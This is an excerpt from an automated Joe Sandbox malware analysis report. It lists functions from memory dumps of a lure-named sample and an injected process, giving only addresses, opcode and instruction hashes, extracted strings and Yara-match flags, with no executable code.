                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017746FC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        • Opcode ID: 1e79d365908ef3a21b5d2e045832c90f172d3c3ac6ef5a902e132d03695304f4
                                                                                                                        • Instruction ID: 45ddf20e4a6140f88e1c3439f34d55ef30441ad5269e5b7f2f921b3edf172582
                                                                                                                        • Opcode Fuzzy Hash: 1e79d365908ef3a21b5d2e045832c90f172d3c3ac6ef5a902e132d03695304f4
                                                                                                                        • Instruction Fuzzy Hash: 74513CB164021ABBEF15ABA8DC99FAEF7A8EF55310F0400DDD606A7182D7709A41DF50
                                                                                                                        Function 017D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                        • Instruction ID: 186873baae7636f1d68c2792c503de3a7ec765761a5ba2776ba88c62c4085631
                                                                                                                        • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                        • Instruction Fuzzy Hash: 71023370508346AFD709CF28C494A6BFBF5EFC8704F54892DBA898B264DB31E945CB52
                                                                                                                        Function 0174B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                        • Instruction ID: 286007f0112c98751d04bbf9fa55e647e05b1deb9619d45a231460f21845294a
                                                                                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                        • Instruction Fuzzy Hash: 4581AD70A452499FEF2ACF6CC8917BEFBA6AF45320F18415AD861A7291C734DC408B92
                                                                                                                        Function 017B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                        • Opcode ID: 4101079802464f0cbae07fb2baa95edfd1efc0d0770bbfb31c71d91eec135ad0
                                                                                                                        • Instruction ID: 18c6f82928a0eadbfb63d7342e0a524082e8cdf575fd80e31b1781df35059860
                                                                                                                        • Opcode Fuzzy Hash: 4101079802464f0cbae07fb2baa95edfd1efc0d0770bbfb31c71d91eec135ad0
                                                                                                                        • Instruction Fuzzy Hash: 5B21627AA0111DABDB10DF79DC84AFEFBF9EF54650F14011AEA05E3205E730E9028BA1
                                                                                                                        Function 0172F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017702BD
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017702E7
                                                                                                                        • RTL: Re-Waiting, xrefs: 0177031E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        • Opcode ID: 73a12993849bf70e5ede79bcd73259a583be8eb20be78324e3303528e5fce0df
                                                                                                                        • Instruction ID: dd2ca0c3aa7ac9a9b75a5b911360d5d90772c35ff7355b0c39c16051c9565a0c
                                                                                                                        • Opcode Fuzzy Hash: 73a12993849bf70e5ede79bcd73259a583be8eb20be78324e3303528e5fce0df
                                                                                                                        • Instruction Fuzzy Hash: 1EE189316087529FDB25CF28C884B2AFBF0EB85724F140A6DF5A58B2A1D774D946CB42
                                                                                                                        Function 0173BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Resource at %p, xrefs: 01777B8E
                                                                                                                        • RTL: Re-Waiting, xrefs: 01777BAC
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01777B7F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        • Opcode ID: 14edade411ef187bf091bd77e5abb8e6f388f64a1e1412a8b486d36771ccbe0d
                                                                                                                        • Instruction ID: afb643c42df7bc87a1816de8e7e64a2796ab7423c36f8ebaae9f30f3178f2b5b
                                                                                                                        • Opcode Fuzzy Hash: 14edade411ef187bf091bd77e5abb8e6f388f64a1e1412a8b486d36771ccbe0d
                                                                                                                        • Instruction Fuzzy Hash: 5741E1313057039FDB24DE29C844B6AF7E5EF88720F000A2DFA5A9B691DB31E9058B91
                                                                                                                        Function 0173B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0177728C
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01777294
                                                                                                                        • RTL: Resource at %p, xrefs: 017772A3
                                                                                                                        • RTL: Re-Waiting, xrefs: 017772C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        • Opcode ID: 66a59f1f42a76194fab4858cecef27a7350f9e294e3f1754e6a7be63dd117f2f
                                                                                                                        • Instruction ID: f3ad2301fd62f7dd5c91554658af0e41f45253c582ad69cde2716e9fc5d2b7a0
                                                                                                                        • Opcode Fuzzy Hash: 66a59f1f42a76194fab4858cecef27a7350f9e294e3f1754e6a7be63dd117f2f
                                                                                                                        • Instruction Fuzzy Hash: 4341F031704202ABCB24DE29CC45F6AF7B5FB94710F100619F965AB281DB20E85287D1
                                                                                                                        Function 017B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        • Opcode ID: 270fa5558cfebe4737466b281af7ac3205b34303393b1bfbd39845942da45e13
                                                                                                                        • Instruction ID: 8de9afabffbf18deaa659670652453f0f1da6ace4040e7e8d33b8a4eb2433d26
                                                                                                                        • Opcode Fuzzy Hash: 270fa5558cfebe4737466b281af7ac3205b34303393b1bfbd39845942da45e13
                                                                                                                        • Instruction Fuzzy Hash: 4A319872A01219AFDB20DF2DCC84BEEF7F8EF44610F544559E949E3205EB30AA458BA0
                                                                                                                        Function 01747D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                        • Instruction ID: 466bd25eeb1db6767427df12dd434f3582f66292f1e2f479eb2835354a7d3599
                                                                                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                        • Instruction Fuzzy Hash: AF91D471E0021A9BEF38DF6DC881ABEFBA5FF44320F54461AE965E72C4D73099818B11
                                                                                                                        Function 01709126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        • Opcode ID: bb38004f2037f7dd33f05cda22e30149dffbcf9f2d5b9dbb59137eaef5916a1c
                                                                                                                        • Instruction ID: 22db77d6f31c5fb12887fbb15b1ca6096957c76bea70921cd1c62f594ee126bc
                                                                                                                        • Opcode Fuzzy Hash: bb38004f2037f7dd33f05cda22e30149dffbcf9f2d5b9dbb59137eaef5916a1c
                                                                                                                        • Instruction Fuzzy Hash: 6B812B71D01269DBDB72DB54CC44BEAB7B8AB48714F0041EAEA0DB7681D7705E85CFA0

                                                                                                                        Executed Functions

                                                                                                                        Function 0325CE4D Relevance: .1, Instructions: 111COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2219c838ca1c0425cf0c5b59bf363074bc1e0d14e026ce14d785e9fcf1e739a5
                                                                                                                        • Instruction ID: 2e7d512c9f80b04a86bd306042e3f2e597a34a11052b3d27bbf6162382fba995
                                                                                                                        • Opcode Fuzzy Hash: 2219c838ca1c0425cf0c5b59bf363074bc1e0d14e026ce14d785e9fcf1e739a5
                                                                                                                        • Instruction Fuzzy Hash: B631A2116593F14ED31E836D08BD679AFC18E5B20174EC2EEDADA6F2F3C4988409D3A5
                                                                                                                        Function 0325C750 Relevance: 19.1, Strings: 15, Instructions: 378COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: >$>'$'$O$P$Z$[$e$m$r$r$y$zt$'$'
                                                                                                                        • API String ID: 0-1210455376
                                                                                                                        • Opcode ID: 1246e76b0a361cc6ac79ccc78aa3ec09e20b27310391064ebb514bc6fc22addb
                                                                                                                        • Instruction ID: 5c806a1438a695af8b4f3e7e04ae8f66111f7446fb2cf1eab302df6cc48223fc
                                                                                                                        • Opcode Fuzzy Hash: 1246e76b0a361cc6ac79ccc78aa3ec09e20b27310391064ebb514bc6fc22addb
                                                                                                                        • Instruction Fuzzy Hash: AF12E3B0D15229CBEB28CF58C994BEDBBB2FB44308F1081D9D509AB281E7B55AC5CF54
                                                                                                                        Function 0326A09C Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6$O$S$\$s
                                                                                                                        • API String ID: 0-3854637164
                                                                                                                        • Opcode ID: db27244a9e6625ce3a86a0346073a7b6a927b5c84f0a9395d535e8e7df5ee9f8
                                                                                                                        • Instruction ID: 317f9a230ec6503c88a05af86c5887778b144d26f31404fefe1363c7104117e4
                                                                                                                        • Opcode Fuzzy Hash: db27244a9e6625ce3a86a0346073a7b6a927b5c84f0a9395d535e8e7df5ee9f8
                                                                                                                        • Instruction Fuzzy Hash: 2951C4B2921219ABDB10EB94DD49FEFB378EF44710F044199ED0C6B140E7B16A988BE1
                                                                                                                        Function 032786DC Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4D$nx
                                                                                                                        • API String ID: 0-470906666
                                                                                                                        • Opcode ID: 19fdd53849b09db96dcf9f2a7c61a7493e78c2a19dd63d364570924699e2976b
                                                                                                                        • Instruction ID: bbc963bec4bb9d27cfb494fe5cf7a7d7cf50ae9c2be261675a86af5e987de5ed
                                                                                                                        • Opcode Fuzzy Hash: 19fdd53849b09db96dcf9f2a7c61a7493e78c2a19dd63d364570924699e2976b
                                                                                                                        • Instruction Fuzzy Hash: 65114FB6D1121CAFDB00DFA9D8409EEBBF9EF48210F14456AE909E7200E7709A04CFA0
                                                                                                                        Function 032561E8 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: m.E?
                                                                                                                        • API String ID: 0-3786607957
                                                                                                                        • Opcode ID: b874d0ebff3878c88e5c97f3a53b62555b1489ea37e37f4caed42639c3a66efc
                                                                                                                        • Instruction ID: 7ba10aee73300dfd2959bf1f05e824c63d4a8c36f657fc8b755370a12382b1c6
                                                                                                                        • Opcode Fuzzy Hash: b874d0ebff3878c88e5c97f3a53b62555b1489ea37e37f4caed42639c3a66efc
                                                                                                                        • Instruction Fuzzy Hash: ED11C233C242539FDB10DD3898C46D9FB55FA06234348635AECA44BB40E736ABD2C780
                                                                                                                        Function 0327730C Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l
                                                                                                                        • API String ID: 0-612859260
                                                                                                                        • Opcode ID: 10b4e31a6fcd0934d99eb8f4665bacb58b7650da5e55386cb5c21848a6f44454
                                                                                                                        • Instruction ID: 9c57dcdb0d07387909e0b6dc64119a5a01c0a10518458c306e7c14dce8e52239
                                                                                                                        • Opcode Fuzzy Hash: 10b4e31a6fcd0934d99eb8f4665bacb58b7650da5e55386cb5c21848a6f44454
                                                                                                                        • Instruction Fuzzy Hash: B701D7B6C11218AFCB40DFE8D941AEEFBF8BB08200F14466AE905F7200F77056448BA0
                                                                                                                        Function 0325602E Relevance: .1, Instructions: 138COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: da65af5760fafccb3341a9085bf753114fe1f5df16af63d20791625c5edc7bff
                                                                                                                        • Instruction ID: 3747d4128786e33cba7cd42d0bb262bef6b2e7fab01fe5cc8d5c8b23fb46c1e8
                                                                                                                        • Opcode Fuzzy Hash: da65af5760fafccb3341a9085bf753114fe1f5df16af63d20791625c5edc7bff
                                                                                                                        • Instruction Fuzzy Hash: 4B410CB1D21219AFDB14CF99C881AEEBBBCFF49720F50415AFA14A7240D7B19641CBA4
                                                                                                                        Function 0327A9AC Relevance: .1, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: af00e471eb26a7eeda5b20d27393cfbe6bacc03fbb5c7fddd9b7eec767c30f8c
                                                                                                                        • Instruction ID: 662def6d3f47dfd07e966723d613106766b97886fea87a28674e026612929fc3
                                                                                                                        • Opcode Fuzzy Hash: af00e471eb26a7eeda5b20d27393cfbe6bacc03fbb5c7fddd9b7eec767c30f8c
                                                                                                                        • Instruction Fuzzy Hash: 5F311AB5A00248AFDB14DF98D841EEFBBF9EF88310F108119F918A7245D774A951CBA1
                                                                                                                        Function 0327B34C Relevance: .1, Instructions: 77COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 03b6134c97b6487e5ed968106379f32dd02b010d37079cd43e79b99c77b6fa1b
                                                                                                                        • Instruction ID: ffa58417af82d5f6dadc89241a16a99b93972256e5c55441079a6114a0390f9f
                                                                                                                        • Opcode Fuzzy Hash: 03b6134c97b6487e5ed968106379f32dd02b010d37079cd43e79b99c77b6fa1b
                                                                                                                        • Instruction Fuzzy Hash: 0A214CB5A10308AFDB14DFA8DC41EAFB7B8EF89310F108109FD18AB244D770A951CBA5
                                                                                                                        Function 03269EDC Relevance: .1, Instructions: 75COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1ac05f5f6e4b1f94fbb19a447dcf2b83de5e788d368cd4ff8f849e03be7d9061
                                                                                                                        • Instruction ID: 7efbe792eb5e230928f89d4ffe8f2dc90d37917bedc7421e961d53b2b57e1e08
                                                                                                                        • Opcode Fuzzy Hash: 1ac05f5f6e4b1f94fbb19a447dcf2b83de5e788d368cd4ff8f849e03be7d9061
                                                                                                                        • Instruction Fuzzy Hash: D21156B63903057BF720DA559C42FAB775CAF84B51F244015FB08AE2C1D6F5B8924AB8
                                                                                                                        Function 0327739C Relevance: .1, Instructions: 65COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f0ea258654c434c17d099b955c1d04d114579161d23893e16c7ab230e03e3d68
                                                                                                                        • Instruction ID: 45d42d052347e904f35f3d7ff7b24b2b0df6f301fbc306a66c2f957e614110a2
                                                                                                                        • Opcode Fuzzy Hash: f0ea258654c434c17d099b955c1d04d114579161d23893e16c7ab230e03e3d68
                                                                                                                        • Instruction Fuzzy Hash: 7411D3F6D11219AF8B00DFA9D9419EFBBF9FF48210F14415AE919E7200E7709A44CBE1
                                                                                                                        Function 0327A7BC Relevance: .1, Instructions: 65COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b0d40f52e8075eee8989e374ec309aeb0f4782be457fc1bfe01a5aa18b295872
                                                                                                                        • Instruction ID: e02c6a34d76679d25a993f125dc5a285d304913138ee2b7dbc4da5f55a700e03
                                                                                                                        • Opcode Fuzzy Hash: b0d40f52e8075eee8989e374ec309aeb0f4782be457fc1bfe01a5aa18b295872
                                                                                                                        • Instruction Fuzzy Hash: 30118E75A103486BD710EBA4DC41FEFBBACEB89710F004409F918AB241D7B0B941CBA2
                                                                                                                        Function 0327A63C Relevance: .1, Instructions: 65COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d9cc9a03e5f4229d80ca7d3b3d3c29f45b2551a005eb5de28ef72e2700d796d8
                                                                                                                        • Instruction ID: cd37992f60b15be940b40ce1d1d1e0ddca3cb941a63d1ff4109b9931e244050c
                                                                                                                        • Opcode Fuzzy Hash: d9cc9a03e5f4229d80ca7d3b3d3c29f45b2551a005eb5de28ef72e2700d796d8
                                                                                                                        • Instruction Fuzzy Hash: EA115E75A10344AFD710EBA4DC41FEFB7ACEB89710F004509FA186B281D7B0B955CBA5
                                                                                                                        Function 0327B6CC Relevance: .0, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5c8074bed1560fbd93ead97a32b0684ce64102b7d9385dde0331ac63bc875bb8
                                                                                                                        • Instruction ID: d3a74fdae604cdd93852df12aa2d373c5b0d43c28b8521a5b0e3f459e0adb360
                                                                                                                        • Opcode Fuzzy Hash: 5c8074bed1560fbd93ead97a32b0684ce64102b7d9385dde0331ac63bc875bb8
                                                                                                                        • Instruction Fuzzy Hash: 0301D6B6214208BBCB04DE99DC80EEB77ADEF8C750F008108BA09E7241D670FC51CBA4
                                                                                                                        Function 03256036 Relevance: .0, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 098f7b74469876a9bdc5720f129fe6faaf877ff332103c0a8216edbc81a51502
                                                                                                                        • Instruction ID: 4f5dda88b1dec17ed8614c09266da78fe9e2b269521399ab36cdfbe311500eec
                                                                                                                        • Opcode Fuzzy Hash: 098f7b74469876a9bdc5720f129fe6faaf877ff332103c0a8216edbc81a51502
                                                                                                                        • Instruction Fuzzy Hash: F30199B1C21229AF8F44CFADD88059EBBF8FB48620B10855BE818E7210D77196418FD4
                                                                                                                        Function 03256180 Relevance: .0, Instructions: 44COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
